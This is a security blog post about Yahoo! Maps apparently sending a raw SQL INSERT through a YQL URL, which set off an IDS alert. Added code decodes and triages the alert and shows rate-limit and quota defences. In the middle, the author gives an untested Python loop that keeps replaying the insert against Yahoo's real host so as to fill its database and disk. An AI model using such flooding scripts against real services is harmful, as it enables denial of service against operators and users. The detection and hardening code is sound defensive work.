SQLi by Design?


Now by no means do I claim to be a good developer, but security I know a little bit about.  So when I ran across this I just had to share and see if anyone would pipe up and either A. tell me what's going on or B. hack Yahoo!  So here is what I have picked up.

User goes to Yahoo! maps (maps.yahoo.com) and wants to find out where Microsoft's office is in Redmond, WA.  So they just type in Microsoft, Redmond and hit enter.  WTF?!  If you have any type of network-based IDS/IPS you will probably be notified that it stopped an outbound SQLi packet.

HTTP: SQL Injection (INSERT)
Hits:            1 packets (864 bytes)
Packet Trace:    Yes
Action:          Block
Period:          1
Total Hit Count: 1 packets (864 bytes)

Obviously this caught my interest so I fired up good old Fiddler2 and searched again.  While Fiddler2 was capturing the traffic it verified the URI request did look like SQLi. What the hell is going on? Part of the URI request included

GET /v1/public/yql?callback=loadData&q=INSERT%20INTO%20user.location.public%20(app%2C%20ctx%2C%20type
%2C%20address%2C%20crumb)%20VALUES%20(%20%22maps%22%2C%20%22maps%22%2C%20%22saved%22%2C
%20%22Microsoft%20Way%2C%20Redmond%2C%20WA%2098052%22%2C%20%22Lmpubi9KRjdsVk8-%22)&
format=json HTTP/1.1

Which basically translates to a URL carrying a SQL command, namely

INSERT INTO user.location.public (app, ctx, type, address, crumb) VALUES ( "maps", "maps", "saved", "Microsoft Way, Redmond, WA 98052", "Lmpubi9KRjdsVk8-")

OK, so there really is nothing malicious going on here.  Obviously, since the NIDS/NIPS alerted on it, the SQLi was outbound.  Now the question that I have is why?  Why pass a SQL command in a freakn' URI?  Why not just pass the information to a page that processes the SQL command on the server?  I have met, and know, a ton of developers who are stupid (when it comes to security), but this just doesn't make sense.
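As an added example (not from the original post), here is the triage step a defender would run on that alert: take the request line Fiddler captured, percent-decode the q parameter, and decide whether the statement is the one the maps "save location" flow is known to send. The path /v1/public/yql is Yahoo's YQL (Yahoo Query Language) endpoint, which accepts a SQL-like statement in q by design, so a signature that fires on any INSERT INTO in a URI will keep flagging legitimate traffic; the allowlist below matches only the exact shape from the capture and anything else on that path, or SQL text on any other path, is left to be investigated. The sample request lines other than the captured one are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample input: the request line from the post's Fiddler capture,
# rejoined onto one line (the post shows it wrapped).
REQUEST_LINE = (
    "GET /v1/public/yql?callback=loadData&q=INSERT%20INTO%20user.location.public"
    "%20(app%2C%20ctx%2C%20type%2C%20address%2C%20crumb)%20VALUES%20(%20%22maps%22"
    "%2C%20%22maps%22%2C%20%22saved%22%2C%20%22Microsoft%20Way%2C%20Redmond%2C%20WA"
    "%2098052%22%2C%20%22Lmpubi9KRjdsVk8-%22)&format=json HTTP/1.1"
)

SQL_VERBS = ("INSERT", "SELECT", "UPDATE", "DELETE", "DROP", "ALTER")

# The one statement shape the maps "save location" flow is known to send:
# a single INSERT into user.location.public with exactly these five columns
# and five double-quoted literals, and nothing before or after it.
EXPECTED_MAPS_INSERT = re.compile(
    r'^\s*INSERT\s+INTO\s+user\.location\.public\s*'
    r'\(\s*app\s*,\s*ctx\s*,\s*type\s*,\s*address\s*,\s*crumb\s*\)\s*'
    r'VALUES\s*\(\s*"[^"]*"(?:\s*,\s*"[^"]*"){4}\s*\)\s*$',
    re.IGNORECASE,
)


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' and decode the query string once."""
    method, target, version = line.split(" ", 2)
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return method, parts.path, params


def leading_verb(text):
    """First whitespace-delimited token of a parameter value, upper-cased."""
    head = text.lstrip().split(None, 1)
    return head[0].upper() if head else ""


def decode_statement(line):
    """Return the percent-decoded statement carried in q (or '' if absent)."""
    _, _, params = parse_request_line(line)
    return params.get("q", "")


def triage(line):
    """Classify an IDS hit as the expected YQL insert, an unexpected statement
    on the YQL path, SQL text in a URL that has no business carrying one,
    or no SQL at all."""
    _, path, params = parse_request_line(line)
    q = params.get("q", "")
    on_yql = path.rstrip("/").endswith("/yql")
    if not on_yql:
        has_sql = any(leading_verb(v) in SQL_VERBS for v in params.values())
        verdict = "sql_outside_yql" if has_sql else "no_sql"
    elif EXPECTED_MAPS_INSERT.match(q):
        verdict = "expected_yql_insert"
    else:
        verdict = "unexpected_yql_statement"
    m = re.search(r"\b(?:INTO|FROM)\s+([\w.]+)", q, re.IGNORECASE)
    return {"path": path, "verb": leading_verb(q), "table": m.group(1) if m else None,
            "statement": q, "verdict": verdict}


if __name__ == "__main__":
    # The captured line plus two constructed ones for comparison.
    for line in (REQUEST_LINE,
                 "GET /v1/public/yql?q=SELECT%20*%20FROM%20user.location.public&format=json HTTP/1.1",
                 "GET /search?p=INSERT%20INTO%20x%20VALUES(1) HTTP/1.1"):
        r = triage(line)
        print(r["verdict"], r["verb"], r["table"])
```

Running it prints expected_yql_insert for the captured line, unexpected_yql_statement for the SELECT, and sql_outside_yql for the search URL; only the last two are worth a ticket. The point of the allowlist is that the decision is made on the decoded statement, not on the raw URI the IDS pattern-matched.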

So instead of trying to figure out why they are doing this LET'S HAVE SOME FUN WITH IT!  Oh, just a quick note here: nothing from this point on has been tested or verified.  Don't want to get in shit over some stupid Yahoo! maps script, so I have never run anything against Yahoo!  Besides, you will probably have to counterfeit some cookies along the way …

But generally speaking, here we could take advantage of a site like this and crash it by filling up the database / disk space and potentially bring the site down.  So make a quick Python script in your favorite text editor like so (you will also need curl).

# Python 2 script (urllib2); untested, as noted above.
import urllib2

# The same save-location request seen in the Fiddler capture, as one URL.
url = ('http://us-locdrop.query.yahoo.com/v1/public/yql?callback=loadData&q=INSERT%20INTO%20user.location.public%20(app%2C%20ctx%2C%20type'
       '%2C%20address%2C%20crumb)%20VALUES%20(%20%22maps%22%2C%20%22maps%22%2C%20%22saved%22%2C'
       '%20%22Microsoft%20Way%2C%20Redmond%2C%20WA%2098052%22%2C%20%22Lmpubi9KRjdsVk8-%22)&'
       'format=json')

stop = 0
while stop != 1:          # loops until killed from the command line
    getme = urllib2.urlopen(url)

Run the script until you terminate it from the command line.  Something like this would theoretically create entries in the table, making the database larger on disk.  Now if you have a super smart admin and everything is located on one disk (bazinga), then sooner or later the entire site comes crashing down because the OS has no more disk space to work with.
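What stops that loop on the server side is not the URL format but the controls behind the endpoint. The following is an added example, not Yahoo's code and not part of the post: a hypothetical guard for a "save this location" endpoint that makes the insert idempotent per user, caps the number of saved rows a user may own, and rate-limits each client in a sliding window. The caps, the user and client identifiers, and the fake clock are all made up so the replay runs instantly and offline; the address string is the one from the capture.

```python
import time
from collections import defaultdict, deque

# Hypothetical limits for the example; a real deployment tunes these.
MAX_SAVED_PER_USER = 5          # hard quota on rows a single user may own
MAX_REQUESTS_PER_WINDOW = 3     # requests a client may make per window
WINDOW_SECONDS = 10.0


class SavedLocationGuard:
    """Server-side checks in front of the 'saved location' insert."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.rows = defaultdict(list)      # user -> addresses already stored
        self.recent = defaultdict(deque)   # client -> timestamps of accepted requests

    def _rate_limited(self, client):
        """Sliding window: drop timestamps older than WINDOW_SECONDS, then
        refuse if the client already has MAX_REQUESTS_PER_WINDOW in the window."""
        now = self.clock()
        q = self.recent[client]
        while q and now - q[0] > WINDOW_SECONDS:
            q.popleft()
        if len(q) >= MAX_REQUESTS_PER_WINDOW:
            return True
        q.append(now)
        return False

    def save(self, user, client, address):
        """Return (accepted, reason). Only 'stored' creates a new row."""
        if self._rate_limited(client):
            return False, "rate_limited"
        owned = self.rows[user]
        if address in owned:
            return True, "duplicate_ignored"   # idempotent: same request, no new row
        if len(owned) >= MAX_SAVED_PER_USER:
            return False, "quota_exceeded"
        owned.append(address)
        return True, "stored"


def simulate_flood(n, same_address=False):
    """Replay the post's loop n times (one request per second on a fake clock)
    and report the per-request outcomes plus how many rows actually landed."""
    t = [0.0]
    guard = SavedLocationGuard(clock=lambda: t[0])
    outcomes = []
    for i in range(n):
        # Constructed inputs: the captured address, or a fresh one per request.
        address = "Microsoft Way, Redmond, WA 98052" if same_address else "addr %d" % i
        outcomes.append(guard.save("user-A", "client-1", address)[1])
        t[0] += 1.0
    return outcomes, len(guard.rows["user-A"])


if __name__ == "__main__":
    outcomes, rows = simulate_flood(14)
    print(rows, "rows after 14 requests:", outcomes)
```

With fresh addresses each time, 14 requests yield 3 stored rows, a burst of rate-limited refusals, 2 more stored rows once the window slides, and then quota_exceeded; the table stops growing at 5 rows no matter how long the loop runs. Replaying the identical captured request (same_address=True) stores one row and ignores the rest.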

Now getting back to reality, it isn't this simple, and if it is, someone should lose their job!  But this takes me right back to the original question: why would a web developer (even a dumb one) use a full SQL command in a URL variable?

All work on this site is not to be reproduced without written permission from Nick Schroedl.